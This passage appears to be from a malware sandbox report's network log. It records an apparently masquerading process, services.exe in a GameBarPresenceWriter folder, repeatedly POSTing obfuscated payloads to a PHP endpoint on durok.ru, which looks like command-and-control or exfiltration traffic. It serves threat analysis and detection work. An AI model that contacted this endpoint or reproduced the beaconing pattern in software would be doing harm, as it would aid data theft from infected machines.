                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qw1avZhEOItO4MZETnxqsagMOFHF5HvLCnrksoCds8xEqLmP67YhusheMkx73s9VxezzQrNyk%2F7INHaeP9sypuUBDa%2BpED7%2BXegX2c5dc2hVQLBNbdXkF3zqBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82619cafb10f3e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=5401&min_rtt=1575&rtt_var=6972&sent=9&recv=12&lost=0&retrans=0&sent_bytes=850&recv_bytes=5254&delivery_rate=1697674&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 11 29 29 27 1a 22 2c 02 57 2b 04 25 08 2a 08 25 5f 3f 32 2d 14 28 3c 25 0d 28 28 24 0e 37 04 0f 05 3d 29 3c 13 31 08 35 02 31 31 2e 5c 05 1d 24 06 3c 3b 2b 00 30 0c 03 1c 2b 3d 25 1f 3d 3e 31 18 24 3c 33 5b 23 28 3a 5d 22 32 38 5b 2c 2f 28 59 39 3c 3c 10 28 1e 22 11 36 3d 21 51 0c 1f 3b 0b 22 39 2c 00 27 3e 21 53 22 20 19 50 31 06 39 0b 22 3b 24 0e 24 5c 2f 5b 25 20 3b 1f 22 3e 24 0f 3f 2e 26 59 26 3c 26 01 3e 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$))'",W+%*%_?2-(<%(($7=)<1511.\$<;+0+=%=>1$<3[#(:]"28[,/(Y9<<("6=!Q;"9,'>!S" P19";$$\/[% ;">$?.&Y&<&>%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              14192.168.2.449755104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:29.120820999 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:29.474538088 CET2548OUTData Raw: 59 5b 5e 5c 54 5f 59 51 5e 58 52 54 56 5d 58 5b 54 55 5b 54 56 5f 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y[^\T_YQ^XRTV]X[TU[TV_S^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$^+?)!$^8?4!'7;[#?3#<:#(,)"Z.#Z*6
                                                                                                                              Dec 26, 2024 17:17:30.294440031 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:30.546041965 CET802INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:30 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z1lePn3ZWb6oIce1L825QsZuy1B8cUBX8L5W%2FjLul4Q29ydRyVbymV4Qb1ve%2Ba4g9lIG%2FEP5KwX%2BgM3n8er6YbpWLWcTbqAVo38D3%2Bhtf9%2Bp6EgOUPYdzy1ybg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261a34bc70f69-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3426&min_rtt=1696&rtt_var=4096&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=93957&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              15192.168.2.449756104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:30.795567989 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:31.174789906 CET2548OUTData Raw: 59 5d 5e 5f 51 59 59 54 5e 58 52 54 56 50 58 54 54 50 5b 5a 56 57 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y]^_QYYT^XRTVPXTTP[ZVWSXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$]<" ?9"",&=':Y'4<7/8Q#X.*#+#;*"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:31.972302914 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:32.238660097 CET805INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:32 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2FxG5r4I81aKvalyXN0%2BoFwQXSwk6HtLYS4sPC6nIKVeins6sXHOCRTyng29XX%2F0iVgbHP2R3a80kp%2FzjEZu8pDOYt8%2BktsA%2F3M61nTnPvN1rRFv0n%2B62NvN6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261adcd3eb9c5-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8771&min_rtt=1953&rtt_var=14369&sent=5&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=25840&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              16192.168.2.449757104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:30.891957045 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:31.515649080 CET2108OUTData Raw: 59 5d 5b 5c 54 5d 59 5a 5e 58 52 54 56 5b 58 55 54 55 5b 54 56 5e 53 5f 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y][\T]YZ^XRTV[XUTU[TV^S_PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$?>)9V62<Z;='>07,(7,>,:0(V3>"Z.#Z*.
                                                                                                                              Dec 26, 2024 17:17:32.069612026 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:32.322053909 CET950INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:32 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IWx6ytFm86SDzUqARbLGYZPDzGCJ%2B%2F%2F6idnN5jYCF%2BI7OPHb0tZiRv1p5XAFDlxvasxn0F1CT5JhL3xfV3vfJOIZzZe5NatkAHhMGf6bPq1eKh%2FbK4DvGJJ8MQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261ae6c0142a3-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=9985&min_rtt=1605&rtt_var=17362&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2415&delivery_rate=21268&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5c 29 00 3b 1b 23 12 2f 0d 2b 2d 26 1b 2a 0f 21 5c 28 22 31 5f 28 59 22 54 2b 38 27 15 23 29 36 13 2a 04 0e 5c 26 0f 2d 01 32 1b 2e 5c 05 1d 27 16 2b 02 38 58 30 1c 0c 01 29 3d 26 46 28 2e 25 5b 33 06 2b 12 20 02 39 02 20 31 2f 03 2f 3f 3c 10 3a 12 30 12 28 09 2e 5c 35 17 21 51 0c 1f 38 52 21 17 0d 5a 31 10 07 1e 22 30 11 57 31 38 32 1d 21 38 3b 57 24 04 30 00 32 0d 05 55 23 3e 3c 0e 3f 03 22 12 24 2c 29 59 2a 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$\);#/+-&*!\("1_(Y"T+8'#)6*\&-2.\'+8X0)=&F(.%[3+ 9 1//?<:0(.\5!Q8R!Z1"0W182!8;W$02U#><?"$,)Y*%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              17192.168.2.449758104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:32.480792046 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:32.833529949 CET2548OUTData Raw: 59 5f 5e 51 54 5b 5c 55 5e 58 52 54 56 51 58 53 54 56 5b 55 56 5f 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y_^QT[\U^XRTVQXSTV[UV_S^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'+,?!6<,>*4&Y0$#4<;"/&:> ="Z.#Z*


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              18192.168.2.449759104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:33.455077887 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:33.802400112 CET2128OUTData Raw: 59 5d 5e 5c 51 59 5c 56 5e 58 52 54 56 51 58 57 54 5c 5b 5a 56 52 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y]^\QY\V^XRTVQXWT\[ZVRSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$[?<*)T!!?..">$:Y'4/X7,;4:X,)7($*5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:34.632436037 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:34.892355919 CET951INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:34 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FDDZN4Jw9YKhSGkG3QCIfQHdfoG4xSvyqaf4lO%2BC6sHo9spopozvtO66zzuwiCSlaY1XjyR0KTbV2hMQWPHg4OhNt2MYCQMu%2B3x%2BeaXf%2Ftl%2F33MPk0aXSZ1ooA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261be6f891861-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4220&min_rtt=1774&rtt_var=5557&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2459&delivery_rate=68406&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 00 3d 07 27 57 37 3c 28 55 2b 13 08 57 3e 0f 31 59 3f 31 29 58 28 01 0c 55 3c 06 0e 0f 34 2a 35 02 29 39 3c 5c 25 25 32 5d 24 31 2e 5c 05 1d 27 5c 3c 3b 2f 06 33 22 00 07 3d 07 25 1a 2a 2d 21 5c 24 11 24 02 20 15 07 07 20 21 20 58 38 3f 23 02 3a 3f 30 5f 2b 23 3d 04 35 17 21 51 0c 1f 3b 0c 21 17 3f 5e 27 2d 2a 0b 35 23 37 1d 26 38 00 56 36 05 0a 0f 30 3a 27 5a 31 0d 37 55 20 13 28 0b 3f 2e 39 02 25 2f 3a 04 29 13 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'='W7<(U+W>1Y?1)X(U<4*5)9<\%%2]$1.\'\<;/3"=%*-!\$$ ! X8?#:?0_+#=5!Q;!?^'-*5#7&8V60:'Z17U (?.9%/:)%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              19192.168.2.449760104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:33.575426102 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:17:33.927407026 CET2548OUTData Raw: 5c 5b 5b 5c 51 5b 59 5b 5e 58 52 54 56 5f 58 57 54 5d 5b 55 56 57 53 5c 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[[\Q[Y[^XRTV_XWT][UVWS\PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$_(??518/-9=>_''3Z4,7<%.9$C?>%"Z.#Z*>
                                                                                                                              Dec 26, 2024 17:17:34.753442049 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:35.010122061 CET797INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:34 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ztKAIv1sn7s1X8k4ad28BuJiC4LUnALad%2BLcx1rAJzeY6geuNAsepDzd2Ri5RKLphbH6lgSeTO%2Fgf6wwLnjuOvRQiGP7vEFQ5QDBH3NaJCq%2FidnCG7qjEjOzoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261bf299443e8-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8612&min_rtt=1694&rtt_var=14472&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=25595&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              20192.168.2.449761104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:35.331481934 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:35.677690029 CET2548OUTData Raw: 5c 5b 5b 5b 54 5c 5c 55 5e 58 52 54 56 58 58 56 54 54 5b 5f 56 53 53 5f 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[[[T\\U^XRTVXXVTT[_VSS_PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$<"0+9&#2,>6*$!0$8 /#",:,)(A+\)5"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:17:36.489032984 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:36.741995096 CET803INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:36 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oQ6Rt2ZbGHtpu5nNOMqVxv3G%2FXZzB36hww4aprLCB3s%2BR0uPsYxIc%2FIe%2FWh9vfixffBBy%2Bkj2N1KwbGFq4UuSZh8grtkYKzUbI5JTWCDO9u%2FtUchYNgXH9oFhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261ca0d31f797-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8341&min_rtt=1623&rtt_var=14045&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=26368&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              21192.168.2.449762104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:36.019506931 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:36.364778042 CET2108OUTData Raw: 59 50 5e 5f 51 5c 59 57 5e 58 52 54 56 5e 58 52 54 57 5b 59 56 52 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP^_Q\YW^XRTV^XRTW[YVRS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$]+!7?=V"$[;%?$&$$7$U#Z>,9(D<;+5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:37.194664955 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:37.450087070 CET943INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:37 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P5AIwzcPBKn%2FkT%2BPgSX9ofPI4sV9IyTww8i2IazkwIcIX5IeKzt5t2uwj9HMNsusv9F3fAclkkNMPHuEEulwJSMi9i8xM2SpUl7RI85xTd9iewrijDzyo7OieA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261ce6acb0f5d-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4187&min_rtt=1686&rtt_var=5634&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2415&delivery_rate=67299&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 1e 3e 5f 3f 53 20 2c 09 08 3c 13 03 0a 2a 31 29 17 2a 32 3a 05 28 01 21 0b 3c 16 0e 0b 21 3a 04 5c 28 2a 20 5c 31 50 25 02 24 21 2e 5c 05 1d 24 03 28 5d 3c 5b 30 31 3e 06 3e 2e 2a 41 2a 2e 2a 02 24 3f 05 10 23 2b 2e 5f 22 22 20 11 2c 2c 02 5e 3a 3c 2b 02 28 1e 22 12 36 07 21 51 0c 1f 38 1f 22 29 2c 07 31 3e 07 1f 22 20 37 57 25 38 2a 57 35 02 3f 56 33 04 01 5d 32 30 2b 55 34 3d 0d 10 2b 3e 32 10 25 3f 29 12 2a 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$>_?S ,<*1)*2:(!<!:\(* \1P%$!.\$(]<[01>>.*A*.*$?#+._"" ,,^:<+("6!Q8"),1>" 7W%8*W5?V3]20+U4=+>2%?)*)%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              22192.168.2.449763104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:37.468619108 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
